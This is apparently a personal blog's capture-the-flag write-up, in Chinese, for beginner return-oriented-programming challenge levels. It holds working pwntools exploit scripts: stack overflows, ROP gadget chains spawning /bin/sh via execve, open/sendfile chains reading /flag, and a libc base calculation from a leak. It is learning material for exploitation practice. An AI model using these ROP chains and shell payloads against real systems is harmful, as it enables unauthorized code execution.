<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="py"><meta name="copyright" content="py"><meta name="generator" content="Hexo 7.3.0"><meta name="theme" content="hexo-theme-yun"><title>Return_Oriented_programming(completed) | 我是py</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/favicon/favicon.ico"><link rel="mask-icon" href="/favicon/favicon.ico" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"juryorca.github.io","root":"/","title":"宇宙终极无敌猫猫虫大王","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="level1.0这个题目的程序用的是旧版glibc，没法本地测试了。但是这题比较简单，我们只需要覆盖返回地址。 from pwn import *path&#x3D;input(&#x27;path:&#x27;)lenth&#x3D;0x40+8padding&#x3D;b&#x27;a&#x27;*lenth+p64(0x401926)p&#x3D;process(path)p.send(padding)print(p.recval">
<meta property="og:type" content="article">
<meta property="og:title" content="Return_Oriented_programming(completed)">
<meta property="og:url" content="http://juryorca.github.io/2025/02/27/Return-Oriented-programming/index.html">
<meta property="og:site_name" content="我是py">
<meta property="og:description" content="level1.0这个题目的程序用的是旧版glibc，没法本地测试了。但是这题比较简单，我们只需要覆盖返回地址。 from pwn import *path&#x3D;input(&#x27;path:&#x27;)lenth&#x3D;0x40+8padding&#x3D;b&#x27;a&#x27;*lenth+p64(0x401926)p&#x3D;process(path)p.send(padding)print(p.recval">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://juryorca.github.io/2025/02/27/Return-Oriented-programming/MC.png">
<meta property="og:image" content="http://juryorca.github.io/2025/02/27/Return-Oriented-programming/level3.0-1.png">
<meta property="og:image" content="http://juryorca.github.io/2025/02/27/Return-Oriented-programming/level10.1.png">
<meta property="article:published_time" content="2025-02-27T12:23:55.000Z">
<meta property="article:modified_time" content="2025-03-23T07:03:45.352Z">
<meta property="article:author" content="py">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://juryorca.github.io/2025/02/27/Return-Oriented-programming/MC.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="py"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="py"></a><div class="site-author-name"><a href="/about/">py</a></div><span class="site-name">我是py</span><sub class="site-subtitle">我是py</sub><div class="site-description">无敌奶龙大王cfy和无敌疾旋鼬大王dcm</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">4</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">0</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">2</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/Juryorca" title="GitHub" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://www.zhihu.com/people/i-wanna-41-50" title="知乎" target="_blank" style="color:#0084FF"><span class="icon iconify" data-icon="ri:zhihu-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="都是大佬stO" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#level1-0"><span class="toc-number">1.</span> <span class="toc-text">level1.0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level1-1"><span class="toc-number">2.</span> <span class="toc-text">level1.1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level2"><span class="toc-number">3.</span> <span class="toc-text">level2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level3"><span class="toc-number">4.</span> <span class="toc-text">level3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-4"><span class="toc-number">5.</span> <span class="toc-text">level 4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-5"><span class="toc-number">6.</span> <span class="toc-text">level 5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-6"><span class="toc-number">7.</span> <span class="toc-text">level 6</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-7"><span class="toc-number">8.</span> <span class="toc-text">level 7</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-8"><span class="toc-number">9.</span> <span class="toc-text">level 8</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-9"><span class="toc-number">10.</span> <span class="toc-text">level 9</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-10"><span class="toc-number">11.</span> <span class="toc-text">level 10</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-11"><span class="toc-number">12.</span> <span class="toc-text">level 11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-12"><span class="toc-number">13.</span> <span class="toc-text">level 12</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-13"><span class="toc-number">14.</span> <span class="toc-text">level 13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-14"><span class="toc-number">15.</span> <span class="toc-text">level 14</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level-15"><span class="toc-number">16.</span> <span class="toc-text">level 15</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="http://Juryorca.github.io/2025/02/27/Return-Oriented-programming/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="py"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="我是py"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">Return_Oriented_programming(completed)</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2025-02-27 20:23:55" itemprop="dateCreated datePublished" datetime="2025-02-27T20:23:55+08:00">2025-02-27</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="修改时间：2025-03-23 15:03:45" itemprop="dateModified" datetime="2025-03-23T15:03:45+08:00">2025-03-23</time></div><div class="post-classify"><span class="post-tag"><a class="tag-item" href="/tags/pwn/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">pwn</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h2 id="level1-0"><a href="#level1-0" class="headerlink" title="level1.0"></a>level1.0</h2><p>这个题目的程序用的是旧版glibc，没法本地测试了。但是这题比较简单，我们只需要覆盖返回地址。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="built_in">input</span>(<span class="string">&#x27;path:&#x27;</span>)</span><br><span class="line">lenth=<span class="number">0x40</span>+<span class="number">8</span></span><br><span class="line">padding=<span class="string">b&#x27;a&#x27;</span>*lenth+p64(<span class="number">0x401926</span>)</span><br><span class="line">p=process(path)</span><br><span class="line">p.send(padding)</span><br><span class="line"><span class="built_in">print</span>(p.recvall().decode(<span class="string">&#x27;l1&#x27;</span>))</span><br></pre></td></tr></table></figure>
<p>非常轻松 主要想测试一下markdown的语法<br>随便插入个好玩的图片好了<br><img src="/2025/02/27/Return-Oriented-programming/MC.png" alt="MC图片" loading="lazy"></p>
<h2 id="level1-1"><a href="#level1-1" class="headerlink" title="level1.1"></a>level1.1</h2><p>原理和1.0相同。</p>
<h2 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h2><p>lseek函数</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="type">off_t</span> <span class="title function_">lseek</span><span class="params">(<span class="type">int</span> fd, <span class="type">off_t</span> offset, <span class="type">int</span> whence)</span>;</span><br></pre></td></tr></table></figure>
<p>whence参数:</p>
<ul>
<li>SEEK_SET offset即为新的位置</li>
<li>SEEK_CUR 目前位置+offset </li>
<li>SEEK_END end+offset</li>
</ul>
<p>因此 两个阶段就是flag的两个部分</p>
<table>
<thead>
<tr>
<th>STACK</th>
</tr>
</thead>
<tbody><tr>
<td>rbp1</td>
</tr>
<tr>
<td>ret1</td>
</tr>
<tr>
<td>ret2</td>
</tr>
</tbody></table>
<p><strong>attention: 不需要填入rbp 因为每次都是从函数开头开始调用的</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="built_in">input</span>(<span class="string">&quot;path:&quot;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+p64(<span class="number">0x40229E</span>)+p64(<span class="number">0x40234b</span>)</span><br><span class="line">p=process(path)</span><br><span class="line">p.send(payload)</span><br><span class="line"><span class="built_in">print</span>(p.recvall().decode(<span class="string">&#x27;l1&#x27;</span>)) </span><br></pre></td></tr></table></figure>
<h2 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h2><p>研究了半天<br>一开始我是打算跳过每一段函数前面的检测部分，但是这有问题<br>如果我跳过这些部分，我无法使得rbp放在合适的位置，那么这个函数leave ret的时候，<br>栈的状态和当前的就大不相同，程序很有可能崩溃。<br>于是用ROPgadget找了下,找到了一个gadget<br><img src="/2025/02/27/Return-Oriented-programming/level3.0-1.png" alt="gadget_rdi" loading="lazy"><br>有了这个就很轻松了，我们构造栈上数据如下</p>
<table>
<thead>
<tr>
<th>stack</th>
</tr>
</thead>
<tbody><tr>
<td>rbp</td>
</tr>
<tr>
<td>poprdi</td>
</tr>
<tr>
<td>p64(1)</td>
</tr>
<tr>
<td>fun1</td>
</tr>
</tbody></table>
<p>(类推)</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="built_in">input</span>(<span class="string">&#x27;path:&#x27;</span>)</span><br><span class="line">p=process(path)</span><br><span class="line">pop_rdi=p64(<span class="number">0x402203</span>)</span><br><span class="line">payload=(<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x78</span>+pop_rdi+p64(<span class="number">1</span>)+p64(<span class="number">0x401C53</span>)+pop_rdi+p64(<span class="number">2</span>)+p64(<span class="number">0x401A8D</span>)\</span><br><span class="line">+pop_rdi+p64(<span class="number">3</span>)+p64(<span class="number">0x401D2F</span>)+pop_rdi+p64(<span class="number">4</span>)+p64(<span class="number">0x401B6D</span>)+pop_rdi+p64(<span class="number">5</span>)+p64(<span class="number">0x401E11</span>))</span><br><span class="line">p.send(payload)</span><br><span class="line"><span class="built_in">print</span>(p.recvall().decode(<span class="string">&#x27;l1&#x27;</span>))</span><br></pre></td></tr></table></figure>
<h2 id="level-4"><a href="#level-4" class="headerlink" title="level 4"></a>level 4</h2><p>这题相当于一个一个自由的构造rop链的题<br>我们几乎拥有所有的pop [register] ret 。<br>还拥有一个syscall<br>还拥有栈的地址。<br>我的想法是运行掉execve(‘&#x2F;bin&#x2F;sh\x00’,[‘-p’])<br>要实现这个 我们需要: </p>
<table>
<thead>
<tr>
<th>option</th>
<th>addr</th>
</tr>
</thead>
<tbody><tr>
<td>pop rdi ; ret</td>
<td>0x401fd5</td>
</tr>
<tr>
<td>pop rax ; ret</td>
<td>0x401fad</td>
</tr>
<tr>
<td>pop rsi ; ret</td>
<td>0x401fcd</td>
</tr>
<tr>
<td>pop rdx ; ret</td>
<td>0x401fa5</td>
</tr>
<tr>
<td>syscall ; ret</td>
<td>0x401fb5</td>
</tr>
</tbody></table>
<p>栈上需要构造如下内容。</p>
<table>
<thead>
<tr>
<th>name</th>
<th>stack</th>
</tr>
</thead>
<tbody><tr>
<td>buf:</td>
<td>‘&#x2F;bin&#x2F;sh\x00’</td>
</tr>
<tr>
<td></td>
<td>[buf+32]</td>
</tr>
<tr>
<td></td>
<td>[buf+40]</td>
</tr>
<tr>
<td></td>
<td>p64(0)</td>
</tr>
<tr>
<td></td>
<td>‘sh\x00’</td>
</tr>
<tr>
<td></td>
<td>‘-p\x00’</td>
</tr>
<tr>
<td>….</td>
<td>………….</td>
</tr>
<tr>
<td>rbp:</td>
<td>trash</td>
</tr>
<tr>
<td>ret:</td>
<td>pop rdi ; ret</td>
</tr>
<tr>
<td></td>
<td>[buf]</td>
</tr>
<tr>
<td></td>
<td>pop rsi ; ret</td>
</tr>
<tr>
<td></td>
<td>[buf+8]</td>
</tr>
<tr>
<td></td>
<td>pop rdx ; ret</td>
</tr>
<tr>
<td></td>
<td>p64(0)</td>
</tr>
<tr>
<td></td>
<td>pop rax ; ret</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>syscall ; ret</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</tbody></table>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="built_in">input</span>(<span class="string">&#x27;path:&#x27;</span>)</span><br><span class="line">pop_rdi=p64(<span class="number">0x401fd5</span>)</span><br><span class="line">pop_rax=p64(<span class="number">0x401fad</span>)</span><br><span class="line">pop_rsi=p64(<span class="number">0x401fcd</span>)</span><br><span class="line">pop_rdx=p64(<span class="number">0x401fa5</span>)</span><br><span class="line">syscall=p64(<span class="number">0x401fb5</span>)</span><br><span class="line">p=process(path)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;located at: &#x27;</span>)</span><br><span class="line">temp=p.recvline().decode(<span class="string">&#x27;l1&#x27;</span>).strip().strip(<span class="string">&#x27;.&#x27;</span>)</span><br><span class="line">buf=<span class="built_in">int</span>(temp,<span class="number">16</span>)</span><br><span class="line">payload=<span class="string">b&#x27;/bin/sh\x00&#x27;</span>+p64(buf+<span class="number">32</span>)+p64(buf+<span class="number">40</span>)+p64(<span class="number">0</span>)+<span class="string">b&#x27;sh&#x27;</span>.ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)+<span class="string">b&#x27;-p&#x27;</span>.ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)+\</span><br><span class="line"><span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x58</span>-<span class="number">48</span>)+pop_rdi+p64(buf)+pop_rsi+p64(buf+<span class="number">8</span>)+pop_rdx+p64(<span class="number">0</span>)+pop_rax+p64(<span class="number">59</span>)+syscall</span><br><span class="line">p.send(payload)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;cat /flag&#x27;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>这题我有个不太理解的点就是，必须要把指令也sendline出去 不能直接interactive 真是奇怪。<br><strong>attention: 第二关一部分会被重新覆盖 注意跳过那一部分即可 不过有个更<br>简单的方法 就是把-p改成占四个字节</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">payload=<span class="string">b&#x27;/bin/sh\x00&#x27;</span>+p64(buf+<span class="number">32</span>)+p64(buf+<span class="number">40</span>)+p64(<span class="number">0</span>)+<span class="string">b&#x27;sh&#x27;</span>.ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>)+<span class="string">b&#x27;-p&#x27;</span>.ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>)+\</span><br><span class="line"><span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x38</span>-<span class="number">44</span>)+pop_rdi+p64(buf)+pop_rsi+p64(buf+<span class="number">8</span>)+pop_rdx+p64(<span class="number">0</span>)+pop_rax+p64(<span class="number">59</span>)+syscall</span><br></pre></td></tr></table></figure>
<h2 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h2><p>这一关写完之后 发现上一关为啥不能直接interactive了  因为我用了输入流重定向… 请不要使用这种方式，这甚至会导致你无法使用gdb.debug 和 gdb.attach<br>这一关没有了栈的地址，但无所谓，我们可以写到bss段里的可写段 ，注意不要把stdin 和stdout覆盖到。(不过事实上是可以覆盖到的，只要没有用到依赖他们的函数)<br>还有一个要注意的点是argv[0]是文件名。我原来没意识到这点，构造了一个&#x2F;bin&#x2F;cat &#x2F;flag 结果纳闷了半天怎么没输出。<br>具体就不多说了</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=(<span class="string">&#x27;/challenge/babyrop_level5.0&#x27;</span>)</span><br><span class="line">bss_addr=<span class="number">0x4050A8</span></span><br><span class="line">syscall=p64(<span class="number">0x402616</span>)</span><br><span class="line">pop_rdi=p64(<span class="number">0x402636</span>)</span><br><span class="line">pop_rsi=p64(<span class="number">0x40262e</span>)</span><br><span class="line">pop_rdx=p64(<span class="number">0x40261e</span>)</span><br><span class="line">pop_rax=p64(<span class="number">0x402607</span>)</span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x48</span>+pop_rdi+p64(<span class="number">0</span>)+pop_rsi+p64(bss_addr)+pop_rdx\</span><br><span class="line">+p64(<span class="number">48</span>)+pop_rax+p64(<span class="number">0</span>)+syscall+pop_rdi+p64(bss_addr)+pop_rsi+p64(bss_addr+<span class="number">16</span>)+pop_rdx+p64(<span class="number">0</span>)\</span><br><span class="line">+pop_rax+p64(<span class="number">59</span>)+syscall</span><br><span class="line">payload2=<span class="string">b&#x27;/bin/sh\x00&#x27;</span>+<span class="string">b&#x27;sh&#x27;</span>.ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>)+<span class="string">b&#x27;-p&#x27;</span>.ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>)+p64(bss_addr+<span class="number">8</span>)+p64(bss_addr+<span class="number">12</span>)+p64(<span class="number">0</span>)</span><br><span class="line">p=process(path)</span><br><span class="line">p.send(payload1)</span><br><span class="line">sleep(<span class="number">3</span>)</span><br><span class="line">p.send(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>第二关 bss段的几乎不可用 因为一开始就放了个stdout，后面的puts马上又会用到<br>那就考虑一下能不能覆盖前面的部分，也就是got.plt和data<br>特意控制不覆盖到puts 因为后面要用<br>事实证明这是可行的。</p>
<h2 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h2><p>给出了sendfile 和open函数 并且还在同一个函数里面，但是貌似不能直接用。我的想法是在rop链上填plt表地址 先看看能不能行再说<br>这里对于open的返回值 个人认为可以直接猜测是3<br>如果不放心 有一个gadget可用<br>0x0000000000401249 : push rax ; add dil, dil ; loopne 0x4012b5 ; nop ; ret<br>这个gadget中的loopne在ecx为零的时候是没有作用的<br>我决定先试一下猜测3能不能成功<br>结果证明我的猜测是正确的</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=(<span class="string">&#x27;/challenge/babyrop_level6.0&#x27;</span>)</span><br><span class="line">pop_rdi=p64(<span class="number">0x401dbb</span>)</span><br><span class="line">pop_rsi=p64(<span class="number">0x401dc3</span>)</span><br><span class="line">pop_rdx=p64(<span class="number">0x401dab</span>)</span><br><span class="line">pop_rcx=p64(<span class="number">0x401db3</span>)</span><br><span class="line">read=p64(<span class="number">0x401160</span>)</span><br><span class="line"><span class="built_in">open</span>=p64(<span class="number">0x4011D0</span>)</span><br><span class="line">send_file=p64(<span class="number">0x4011A0</span>)</span><br><span class="line">data_addr=p64(<span class="number">0x405088</span>)</span><br><span class="line">zero=p64(<span class="number">0</span>)</span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x38</span>+pop_rdi+zero+pop_rsi+data_addr+pop_rdx+p64(<span class="number">8</span>)+read+pop_rdi\</span><br><span class="line">+data_addr+pop_rsi+zero+<span class="built_in">open</span>+pop_rdi+p64(<span class="number">1</span>)+pop_rsi+p64(<span class="number">3</span>)+pop_rdx+zero+pop_rcx+p64(<span class="number">100</span>)+send_file</span><br><span class="line">payload2=<span class="string">b&#x27;/flag&#x27;</span></span><br><span class="line">p=process(path)</span><br><span class="line">p.send(payload1)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.send(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h2><p>发现无法在本地运行并不是libc版本不同 而是没有安装一个库叫capstone</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt install libcapstone-dev</span><br></pre></td></tr></table></figure>
<p>即可安装<br>这题其实用one_gadget基本上可以直接过 但是为了练习我决定还是自己构造ROP链<br>题目没有给我们对应的libc.so.6版本<br>可以通过ldd指令，找到程序使用的libc的文件地址，然后下载到本地，就可以用了<br>为了书写方便 尽量少用到libc里面的gadget 原来文件有的多用</p>
<table>
<thead>
<tr>
<th>addr</th>
<th>instruction</th>
</tr>
</thead>
<tbody><tr>
<td>0x4022c3</td>
<td>pop rdi;ret</td>
</tr>
<tr>
<td>0x4022c1</td>
<td>pop rsi; pop r15;ret</td>
</tr>
<tr>
<td>0x119431l</td>
<td>pop rdx; pop r12;ret</td>
</tr>
<tr>
<td>0x052290l</td>
<td>system()</td>
</tr>
</tbody></table>
<p>l代表libc中 需要带上base<br>这题system函数貌似会直接降权，我们需要找其他方案<br>我决定用之前的open sendfile方案<br>经过重写之后，新增的gadget如下</p>
<table>
<thead>
<tr>
<th>addr</th>
<th>instruction</th>
</tr>
</thead>
<tbody><tr>
<td>0x10df00l</td>
<td>open</td>
</tr>
<tr>
<td>0x1131C0l</td>
<td>sendfile</td>
</tr>
<tr>
<td>0x10257dl</td>
<td>pop rdx ; pop rcx ; pop rbx ;ret</td>
</tr>
</tbody></table>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">path=<span class="string">&#x27;/challenge/babyrop_level7.0&#x27;</span></span><br><span class="line">pop_rdi = p64(<span class="number">0x4022c3</span>)</span><br><span class="line">pop_rsip = p64(<span class="number">0x4022c1</span>)</span><br><span class="line">pop_rdx_pop_rcxpl=<span class="number">0x10257d</span></span><br><span class="line">systeml=<span class="number">0x052290</span></span><br><span class="line">sendfilel=<span class="number">0x1131C0</span></span><br><span class="line">openl=<span class="number">0x10df00</span></span><br><span class="line">data_addr=p64(<span class="number">0x405080</span>)</span><br><span class="line">read=p64(<span class="number">0x401150</span>)</span><br><span class="line">trash=p64(<span class="number">114514</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p=process(path)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;in libc is:&#x27;</span>)</span><br><span class="line">temp=p.recvline().decode(<span class="string">&#x27;l1&#x27;</span>).strip().strip(<span class="string">&#x27;.&#x27;</span>)</span><br><span class="line">system=<span class="built_in">int</span>(temp,<span class="number">16</span>)</span><br><span class="line">base=system-systeml</span><br><span class="line"></span><br><span class="line">pop_rdx_pop_rcxp=p64(pop_rdx_pop_rcxpl+base)</span><br><span class="line">sendfile=p64(sendfilel+base)</span><br><span class="line"><span class="built_in">open</span>=p64(openl+base)</span><br><span class="line"></span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x88</span>+pop_rdi+p64(<span class="number">0</span>)+pop_rsip+data_addr+trash+pop_rdx_pop_rcxp+p64(<span class="number">16</span>)+trash*<span class="number">2</span>+read+pop_rdi+data_addr+pop_rsip+p64(<span class="number">0</span>)*<span class="number">2</span>\</span><br><span class="line">+<span class="built_in">open</span>+pop_rdi+p64(<span class="number">1</span>)+pop_rsip+p64(<span class="number">3</span>)+p64(<span class="number">0</span>)+pop_rdx_pop_rcxp+p64(<span class="number">0</span>)+p64(<span class="number">100</span>)+trash+sendfile</span><br><span class="line">payload2=<span class="string">b&#x27;/flag&#x27;</span></span><br><span class="line">p.send(payload1)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line">p.send(payload2)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h2><p>got表里面的在函数调用过一次之后会存储实际的地址。<br>并且我们可以控制rdi。这样就可以获得libc里面的值 再调用level7相同的脚本即可<br>gadget:</p>
<table>
<thead>
<tr>
<th>address</th>
<th>insturction</th>
</tr>
</thead>
<tbody><tr>
<td>0x401fd3</td>
<td>pop rdi ;ret</td>
</tr>
<tr>
<td>0x401fd1</td>
<td>pop rsi ; pop r15 ;ret</td>
</tr>
<tr>
<td>0x10257dl</td>
<td>pop rdx ; pop rcx ; pop rbx ;ret</td>
</tr>
<tr>
<td>0x401140</td>
<td>read</td>
</tr>
<tr>
<td>0x401110</td>
<td>puts(in plt)</td>
</tr>
<tr>
<td>0x401D29</td>
<td>challenge</td>
</tr>
<tr>
<td>0x084420l</td>
<td>puts(in libc)</td>
</tr>
<tr>
<td>0x1131c0l</td>
<td>sendfile</td>
</tr>
<tr>
<td>0x10df00l</td>
<td>open</td>
</tr>
</tbody></table>
<p>puts在got表中地址是0x404028 data地址是0x404078<br>泄露之后重新运行main再次运行<br>其他和level7一致</p>
